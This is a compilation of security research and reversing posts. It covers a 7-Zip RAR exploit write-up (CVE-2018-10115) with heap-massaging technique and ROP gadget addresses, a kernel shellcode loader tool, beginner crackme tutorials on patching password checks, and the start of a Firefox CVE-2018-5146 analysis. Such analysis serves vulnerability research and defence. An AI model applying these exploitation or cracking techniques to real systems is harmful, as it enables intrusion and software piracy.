I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom4:

void AString::SetFrom(const char *s, unsigned len)
{
  if (len > _limit)
  {
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  }
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method will always terminate the string with a null byte. Moreover, we see that AStringkeeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocation sizes of this type need to be strictly increasing in their size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.

ROP

We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAllocmemcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;
exit(0);

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed5 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.

Conclusion

In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed for failure.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Timeline of Disclosure

  • 2018-03-06 — Discovery
  • 2018-03-06 — Report
  • 2018-04-14 — MITRE assigned CVE-2018-10115
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Reverse Engineering x64 for Beginners – Linux

As to get started, we will be writing a simple C++ program which will prompt for a password. It will check if the password matches, if it does, it will prompt its correct, else will prompt its incorrect. The main reason I took up this example is because this will give you an idea of how the jump, if else and other similar conditions work in assembly language. Another reason for this is that most programs which have hardcoded keys in them can be cracked in a similar manner except with a bit of more mathematics, and this is how most piracy distributors crack the legit softwares and spread the keys.

Let’s first understand the C++ program that we have written. All of the code will be hosted in my Github profile :-

https://github.com/paranoidninja/ScriptDotSh-Reverse-Engineering

The code is pretty simple here. Our program takes one argument as an input which is basically the password. If I don’t enter any password, it will print the help command. If I specify a password, it gets stored as a char with 10 bytes and will send the password to the check_pass() function. Our hardcoded password is PASSWORD1 in the check_pass() function. Out here, our password get’s compared with the actual password variable mypass with the strcmp() function. If the password matches, it returns Zero, else it will return One. Back to our main function, if we receive One, it prints incorrect password, else it prints correct password.

Now, let’s get this code in our GDB debugger. We will execute the binary with GDB and we will first setup a breakpoint on main before we send the argument. Secondly, we will enable time travelling on our GDB, so that if we somehow go one step ahead by mistake, we can reverse that and come one step back again. This can be done with the following command: target record-full and reverse-stepi/nexti

Dont’ be scared if you don’t understand any of this. Just focus on the gdb$ part and as you can see above, I have given an incorrect password as pass123 after giving the breakpoint with break main. My compiled code should print an incorrect password as seen previously, but as we proceed, we will find two ways to bypass the code; one is by getting out the actual password from memory and second is by modifying the jump value and printing that the password is correct.

Disassembly

The next step is to disassemble the entire code and try to understand what actually is happening:

Our main point of intereset in the whole disassembled code would be the below few things:

1. je – je means jump to an address if its equal to something. If unequal, continue with the flow.

2. call – calls a new function. Remember that after this is loaded, the disassembled code will change from the main disassembly function to the new function’s disassembly code.

3. test – check if two values are equal

4. cmp – compare two values with each other

4. jne – jne means jump to and address if its not equal to something. Else, continue with the flow.

Some people might question why do we have test if we have cmp which does the same thing. The answer can be found here which is explained beautifully:-

https://stackoverflow.com/questions/39556649/linux-assembly-whats-difference-between-test-eax-eax-and-cmp-eax-0

So, if we see the disassembly code above, we know that if we run the binary without a password or argument, it will print help, else will proceed to check the password. So this cmp should be the part where it checks whether we have an arguement. If an arguement doesn’t exist it will continue with the printing of help, else it will jump to <main+70>. If you see that numbers next to the addresses on the left hand side, we can see that at <+70>, we are moving something into the rax register. So, what we will do is we will setup a breakpoint at je, by specifying its address 0x0000000000400972 and then will see if it jumps to <+70> by asking it to continue with c. GDB command c will continue running the binary till it hits another breakpoint.

And now if you do a stepi which is step iteration, it will step one iteration of execution and it should take you to <+70> where it moves a Quad Word into the rax register.

So, since our logic is correct till now, let’s move on to the next interesting thing that we see, which is the call part. And if you see next to it, it says something like <_Z10check_passPc> which is nothing but our check_pass() function. Let’s jump to that using stepi and see what’s inside that function.

Once, you jump into the check_pass() function and disassemble it, you will see a new set of disassembled code which is the code of just the check_pass() function itself. And here, there are four interesting lines of assembly code here:

The first part is where the value of rdx register is moved to rsi and rax is moved to rdi. The next part is strcmp() function is called which is a string compare function of C++. Next, we have the test which compares the two values, and if the values are equal, we jump (je) to <_Z10check_passPc+77> which will move the value Zero in the eax register. If the values are not equal, the function will continue to proceed at <+70> and move the value One in the eax register. Now, these are nothing but just the return values that we specified in the check_pass() function previously. Since we have entered an invalid password, the return value which will be sent would be One. But if we can modify the return value to Zero, it would print out as “Correct Password”.

Also, we can go ahead and check what is being moved into the rsi and the rdi register. So, let’s put a breakpoint there and jump straight right to it.

As you can see from the above image, I used x/s $rdx and x/s $rax commands to get the values from the register. x/s means examine the register and display it as a string. If you want to get it in bytes you can specify x/b or if you want characters, you can specify x/c and so on. There are multiple variations however. Now our first part of getting the password is over here. However, let’s continue and see how we can modify the return value at <_Z10check_passPc+70> to Zero. So, we will shoot stepi and jump to that iteration.

Epilogue

As you can see above, the function moved 0x1 to eax in the binary, but before it can do a je, we modified the value to 0x0 in eax using set $eax = 0x0 and then continued the function with c as below, and Voila!!! We have a value returned as Correct Password!

Learning assembly isn’t really something as a rocket science. But given a proper amount of time, it does become understandable and easy with experience.

This was just a simple example to get you started in assembly and reverse engineering. Now as we go deeper, we will see socket functions, runtime encryption, encoded hidden domain names and so on. This whole process can be done using x64dbg in Windows as well which I will show in my next blogpost.

Reverse Engineering x64 for Beginners – Windows

In this post, I will be using x64dbg since I wasn’t able to find a version of x64 Immunity debugger or Olly Debugger to reverse engineer the binary. However, below are alternatives along with the download links which you can choose. If you are able to find other x64 debuggers for windows, do add them in the comment and I will mention them here.:

  1. Immunity Debugger
  2. Olly Debugger
  3. IDA Pro
  4. WinDBG
  5. X64dbg

Immunity Debugger is an awesome tool if you are debugging x86 binaries. However, since we are only focusing on x64, we will have to use x64dbg which supports both x86 and x64 disassembly.

Once you have downloaded the required debugger, you can compile the source code which is uploaded on my Git repo here. You can compile the binary in Windows with the below command:

$ g++ crack_me.cpp -o crack_mex64.exe -static -m64

Make sure you use a 64-bit version of g++ compiler else it will compile but won’t work. You can also download the binary from my repo mentioned above. I prefer to use the Mingw-x64 compiler, but some also use clang x64. It all boils down to the preference of which one you are familiar with.

Disassembly

Once you have compiled the binary, let’s load it up in x64dbg. Remember, that our binary accepts an argument which is our password. So, unlike GDB where we can supply the argument inside the GDB; in Windows, we will have to supply it during the loading of binary via the command line itself.

To load the binary into x64dbg, below is the commandline you can use:

.\x64dbg.exe crack_mex64.exe pass123

Once, the binary is loaded, you will see six windows by default. Let me quickly explain what these windows are:

The top left window displays the disassembled code. This is the same as disassemble main in GDB. It will walk you through the entire assembly code of the binary. The top right window contains the values of the registers. Since we are debugging a x64 binary, the values of x86 registers for example EAX or ECX will be inside of RAX or RCX itself.

The middle two windows, left one shows you the .text section of the assembly code, and right one shows the fastcalls in x64 assembly. Fastcalls are x64 calling conventions which is done between just 4 registers. I would recommend skipping this if you are A beginner. However for the curious cats, more information can be found here.

The bottom left window displays the memory dump of the binary, and the bottom right shows the stack. Whenever variables are passed on to another function, you will see them here.

Once, the above screen is loaded, we will first search for strings in our binary. We know a few strings when we executed the binary i.e. ‘Incorrect password’, or ‘Correct password’ or ‘help’. As for now, our primary aim is to find the actual password and secondary aim is to modify the RAX register to Zero, to display ‘Correct Password’ since our check_pass() function returns 0 or 1 depending upon whether the password is right or wrong.

To search for strings, right click anywhere in the disassembled code -> Search for -> All Modules ->String References

This will bring you to the below screen where it shows you the string Incorrect Password. Since we know there will be a comparison between our input password and the original password before printing whether the password is correct or not, we need to find the same from the disassembled code to view the registers and the stack to search for the cleartext password. Now right click on the ‘Incorrect Password’ area and select Follow in Disassembler. This will display the below screen in the disassembly area:

What I have done over here in the above image, is I’ve added a breakpoint at 00000000004015F6. The main reason for that is because I can see a jmp statement and a call statement right above it. This means that a function was called before reaching this point and the last function to be executed before the printing of ‘Correct/Incorrect password’ is the check_pass() function. So, this is the point where our interesting function starts. Lets just hit on the run button till it reaches this breakpoint execution.

Once, you’ve reached this breakpoint, hit stepi (F7) till you reach the mov RCX, RAX or 0000000000401601 address. Once it is there, you can see our password pass123 loaded on to the RCXregister from RAX register. This is nothing but our argument loaded into the function check_pass(). Now, keep stepping into the next registers till you reach the address 0000000000401584, which is where our plaintext password gets loaded into the RAX register.

You can see on the top right window that our password ‘pass123’ and original password ‘PASSWORD1’ is loaded onto the registers RCX and RAX for comparison. The completes our primary motive of getting the plaintext password. Now since our passwords are different, it will be printing out ‘Incorrect password’. We now need to modify the return value of 1 to 0 which is returned by the check_pass() function. If you see the above image, 3 lines below our code where the password is loaded onto the register, you will test EAX, EAX at address 0000000000401590. And we see two jump statements after them. So, if the test value returns they are equal, it will jump (je = jump if equal) to crack_m3x64.40159B which is where it will mov 0 to the EAX register. But since the password we entered is wrong, it will not jump there and continue to the next code segment where it will move 1 to EAX i.e. at address 0000000000401594. So, we just setup a breakpoint on this address by right clicking and selecting breakpoint -> toggle since we need to modify the register value at that point and continue running the binary till it hits that breakpoint:

Once, this breakpoint is hit, you will the value 1 loaded into the RAX register on the right-hand side. The EAX is a 32 bit register which is the last 32 bits of the RAX register. In short,

RAX = 32 bits + EAX

EAX = 16 bits + AX

AX = AH(8 bits) + AL(8 bits)

and so on.

Therefore, when 1 is loaded into EAX, it by default goes into RAX register. Finally, we can just select the RAX register on the right-hand side, right click and decrement it to Zero.

Epilogue

And then you should see that RAX is changed to Zero. Now continue running the binary till it reaches the point where it checks the return value of the binary as to whether its Zero or One, which is at address 000000000040160C. You can see in the below image that it uses cmp to check if the value matches to 1.

It uses the jne (jump if not equal) condition, which means it will jump to crack_mex64.401636 if its is not equal to One. And crack_mex64.401636 is nothing but our printing of ’Correct Password’ at address 0000000000401636. You can also see in the register that our password is still pass123 and inspite of that it has printed it’s the correct password.

This would be it for the cracking session of windows for this blog. In the next blog, we will be looking at a bit more complex examples rather than finding just plaintext passwords from binaries.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

